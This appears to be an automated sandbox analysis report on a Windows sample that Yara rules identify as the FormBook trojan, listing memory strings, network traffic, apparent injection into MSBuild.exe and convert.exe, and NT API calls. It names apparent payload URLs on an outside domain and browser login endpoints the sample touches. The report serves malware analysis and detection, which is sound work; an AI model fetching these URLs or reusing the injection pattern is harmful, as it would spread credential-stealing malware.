Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://github.com/HerpDerpinstine/bHapticsLib
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Footer.cli
Source: 9B1ZyhsFUq.exe	String found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Oszina.cli
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033f
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 0000000B.00000002.2508578824.00000000032F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: convert.exe, 0000000B.00000003.1901451391.0000000007EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: convert.exe, 0000000B.00000002.2514655863.0000000007EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49711 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042B253 NtClose,	8_2_0042B253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C35C0 NtCreateMutant,LdrInitializeThunk,	8_2_010C35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2B60 NtClose,LdrInitializeThunk,	8_2_010C2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_010C2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_010C2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3010 NtOpenDirectoryObject,	8_2_010C3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3090 NtSetValueKey,	8_2_010C3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C4340 NtSetContextThread,	8_2_010C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C4650 NtSuspendThread,	8_2_010C4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C39B0 NtGetContextThread,	8_2_010C39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2B80 NtQueryInformationFile,	8_2_010C2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BA0 NtEnumerateValueKey,	8_2_010C2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BE0 NtQueryValueKey,	8_2_010C2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2BF0 NtAllocateVirtualMemory,	8_2_010C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AB0 NtWaitForSingleObject,	8_2_010C2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AD0 NtReadFile,	8_2_010C2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2AF0 NtWriteFile,	8_2_010C2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D00 NtSetInformationFile,	8_2_010C2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3D10 NtOpenProcessToken,	8_2_010C3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D10 NtMapViewOfSection,	8_2_010C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2D30 NtUnmapViewOfSection,	8_2_010C2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C3D70 NtOpenThread,	8_2_010C3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DB0 NtEnumerateKey,	8_2_010C2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2DD0 NtDelayExecution,	8_2_010C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C00 NtQueryInformationProcess,	8_2_010C2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2C60 NtCreateKey,	8_2_010C2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CA0 NtQueryInformationToken,	8_2_010C2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CC0 NtQueryVirtualMemory,	8_2_010C2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2CF0 NtOpenProcess,	8_2_010C2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F30 NtCreateSection,	8_2_010C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F60 NtCreateProcessEx,	8_2_010C2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2F90 NtProtectVirtualMemory,	8_2_010C2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FA0 NtQuerySection,	8_2_010C2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FB0 NtResumeThread,	8_2_010C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2FE0 NtCreateFile,	8_2_010C2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2E30 NtWriteVirtualMemory,	8_2_010C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2E80 NtReadVirtualMemory,	8_2_010C2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2EA0 NtAdjustPrivilegesToken,	8_2_010C2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C2EE0 NtQueueApcThread,	8_2_010C2EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03764340 NtSetContextThread,LdrInitializeThunk,	11_2_03764340
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03764650 NtSuspendThread,LdrInitializeThunk,	11_2_03764650
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037635C0 NtCreateMutant,LdrInitializeThunk,	11_2_037635C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762B60 NtClose,LdrInitializeThunk,	11_2_03762B60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_03762BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_03762BE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_03762BA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AF0 NtWriteFile,LdrInitializeThunk,	11_2_03762AF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AD0 NtReadFile,LdrInitializeThunk,	11_2_03762AD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037639B0 NtGetContextThread,LdrInitializeThunk,	11_2_037639B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F30 NtCreateSection,LdrInitializeThunk,	11_2_03762F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FE0 NtCreateFile,LdrInitializeThunk,	11_2_03762FE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FB0 NtResumeThread,LdrInitializeThunk,	11_2_03762FB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_03762EE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_03762E80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_03762D30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_03762D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_03762DF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DD0 NtDelayExecution,LdrInitializeThunk,	11_2_03762DD0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_03762C70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C60 NtCreateKey,LdrInitializeThunk,	11_2_03762C60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_03762CA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763010 NtOpenDirectoryObject,	11_2_03763010
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763090 NtSetValueKey,	11_2_03763090
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762B80 NtQueryInformationFile,	11_2_03762B80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762AB0 NtWaitForSingleObject,	11_2_03762AB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F60 NtCreateProcessEx,	11_2_03762F60
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762FA0 NtQuerySection,	11_2_03762FA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762F90 NtProtectVirtualMemory,	11_2_03762F90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762E30 NtWriteVirtualMemory,	11_2_03762E30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762EA0 NtAdjustPrivilegesToken,	11_2_03762EA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763D70 NtOpenThread,	11_2_03763D70
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03763D10 NtOpenProcessToken,	11_2_03763D10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762D00 NtSetInformationFile,	11_2_03762D00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762DB0 NtEnumerateKey,	11_2_03762DB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762C00 NtQueryInformationProcess,	11_2_03762C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CF0 NtOpenProcess,	11_2_03762CF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03762CC0 NtQueryVirtualMemory,	11_2_03762CC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027B50 NtReadFile,	11_2_03027B50
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030279F0 NtCreateFile,	11_2_030279F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027E40 NtAllocateVirtualMemory,	11_2_03027E40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027C40 NtDeleteFile,	11_2_03027C40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03027CE0 NtClose,	11_2_03027CE0

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 0_2_00007FF7C1930E88	0_2_00007FF7C1930E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401000	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00402820	8_2_00402820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00410083	8_2_00410083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040E103	8_2_0040E103
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401190	8_2_00401190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00403300	8_2_00403300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004025C0	8_2_004025C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040FE63	8_2_0040FE63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042D693	8_2_0042D693
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041672E	8_2_0041672E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00416733	8_2_00416733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01080100	8_2_01080100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01118158	8_2_01118158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C516C	8_2_010C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0115B16B	8_2_0115B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109B1B0	8_2_0109B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011501AA	8_2_011501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011481CC	8_2_011481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113F0CC	8_2_0113F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F0E0	8_2_0114F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011470E9	8_2_011470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114132D	8_2_0114132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114A352	8_2_0114A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107D34C	8_2_0107D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D739A	8_2_010D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011503E6	8_2_011503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E3F0	8_2_0109E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01130274	8_2_01130274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010952A0	8_2_010952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AB2C0	8_2_010AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147571	8_2_01147571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01150591	8_2_01150591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112D5B0	8_2_0112D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F43F	8_2_0114F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01142446	8_2_01142446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113E4F6	8_2_0113E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B4750	8_2_010B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090770	8_2_01090770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114F7B0	8_2_0114F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108C7C0	8_2_0108C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010817EC	8_2_010817EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011416CC	8_2_011416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AC6E0	8_2_010AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01099950	8_2_01099950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AB950	8_2_010AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A6962	8_2_010A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010929A0	8_2_010929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0115A9A6	8_2_0115A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD800	8_2_010FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109A840	8_2_0109A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010768B8	8_2_010768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010938E0	8_2_010938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE8F0	8_2_010BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FB76	8_2_0114FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AFB80	8_2_010AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01146BD7	8_2_01146BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01105BF0	8_2_01105BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010CDBF9	8_2_010CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147A46	8_2_01147A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FA49	8_2_0114FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01103A6C	8_2_01103A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108EA80	8_2_0108EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D5AA0	8_2_010D5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112DAAC	8_2_0112DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113DAC6	8_2_0113DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109AD00	8_2_0109AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01093D40	8_2_01093D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01141D5A	8_2_01141D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01147D73	8_2_01147D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A8DBF	8_2_010A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AFDC0	8_2_010AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108ADE0	8_2_0108ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090C00	8_2_01090C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01109C32	8_2_01109C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01130CB5	8_2_01130CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01080CF2	8_2_01080CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FF09	8_2_0114FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D2F28	8_2_010D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B0F30	8_2_010B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01104F40	8_2_01104F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091F92	8_2_01091F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FFB1	8_2_0114FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01082FC8	8_2_01082FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109CFE0	8_2_0109CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114EE26	8_2_0114EE26
